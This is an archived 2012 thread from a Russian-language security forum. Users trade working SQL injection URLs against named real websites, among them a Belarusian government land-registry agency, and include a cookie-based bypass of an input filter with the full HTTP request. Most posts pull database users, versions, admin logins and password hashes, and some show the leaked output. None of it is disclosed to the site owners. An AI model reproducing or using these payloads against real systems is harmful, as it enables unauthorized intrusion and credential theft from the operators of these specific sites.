ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

10.03.2012, 00:22
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Код:
Code:
http://www.murmancity.com/news/sel_news_from_id.php?id=8128+or+1+group+by+concat('xaker',floor(rand(0)*2))+having+min(0)+or+1+--+
|
|
|

10.03.2012, 12:42
|
|
Новичок
Регистрация: 04.06.2007
Сообщений: 12
Провел на форуме: 580611
Репутация:
38
|
|
для любителей NY
PR 5
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.creativecoreny.com/index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat%28username,0x3a,password%29chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--[/COLOR][/COLOR]
|
|
|

10.03.2012, 18:33
|
|
Guest
Сообщений: n/a
Провел на форуме: 103014
Репутация:
76
|
|
Сайт Брестского агентства по государственной регистрации и земельному кадастру.
ТИЦ = 20
PR = 3
Код:
Code:
http://agr.brest.by/agencies/?id=-3'+union+all+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12+--+
|
|
|
|

11.03.2012, 12:48
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме: 102906
Репутация:
-14
|
|
тИЦ 425
Код:
Code:
http://promlitie.ru/index.php?r=9&vmonth=2012-03&nid=99999999999+UnIon+selECt+1,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,3+--+
promlit6_user@localhostromlit6_data:5.0.92-log
|
|
|

11.03.2012, 12:54
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме: 168709
Репутация:
1
|
|
Сообщение от Ro Man
Ro Man said:
для любителей NY
PR 5
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.creativecoreny.com/index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat%28username,0x3a,password%29chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--[/COLOR][/COLOR]
Мега - Боян, который валяется в гугле около года
Так что скуля не в зачет!
|
|
|

11.03.2012, 19:20
|
|
Guest
Сообщений: n/a
Провел на форуме: 40748
Репутация:
78
|
|
m-game.com.ua
Код:
Code:
http://m-game.com.ua/?podr=compare&patch=catalog&version_ids=298+and+''='select' true //вырезается select
http://m-game.com.ua/?podr=compare&patch=catalog&version_ids=298+and+''='selselectect' false //но не рекурсивно!
http://m-game.com.ua/?podr=compare&patch=catalog&version_ids=298+and+'test'='(test)' true //вырезаются скобки
http://m-game.com.ua/?podr=compare&patch=catalog&version_ids=298+--+а false //так как комментирование не работает, и под фильтр не попадает, можно сразу сказать что условие заключено в скобки.
В общем - выхода нет. Но как оказалось - руки кодерам лучше было бы оборвать. Под фильтр попадают только массивы _GET и _POST, а массив _COOKIE не проверяется.
Код:
Code:
GET /?podr=compare&patch=catalog HTTP/1.1
Host: m-game.com.ua
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: version_ids=298) union select 1,user(),version(),4,5,6,7-- f;
Код:
Code:
user:mgame@localhost version:5.0.77
|
|
|
|

11.03.2012, 20:29
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Код:
Code:
http://www.gipsstyle.ru/price.php?cat_id=3+or+1+group+by+concat(version(),floor(rand(0)*2))+having+min(0)+or+1+--+
|
|
|

12.03.2012, 00:57
|
|
Guest
Сообщений: n/a
Провел на форуме: 103014
Репутация:
76
|
|
Оффициальный сайт группы "Старый приятель".
ТИЦ = 30
PR = 2
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.star-priyatel.ru/events.php?mode=show&id=9999999+union+select+1,2,3,concat_ws(0x3a,f_id,f_login,f_password),4,5+from+t_admins+limit+1,1--[/COLOR][/COLOR]
|
|
|
|

12.03.2012, 17:48
|
|
Guest
Сообщений: n/a
Провел на форуме: 97332
Репутация:
38
|
|
http://www.game-leshiy.ru/porno_games.php?id=-10'+union+select+1,2,3,4,5,6,7,8,9,10+--+
|
|
|
|

12.03.2012, 20:22
|
|
Познающий
Регистрация: 16.01.2010
Сообщений: 33
Провел на форуме: 645430
Репутация:
7
|
|
ТиЦ 550, PR 4, ЯК, DMOZ, YI 75k, GI 107k
http://www.globalomsk.ru/directory/index.php?category=1 UNION SELECT NULL,NULL,CONCAT_WS(0x3a,user(),version(),database ()),NULL,NULL#
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|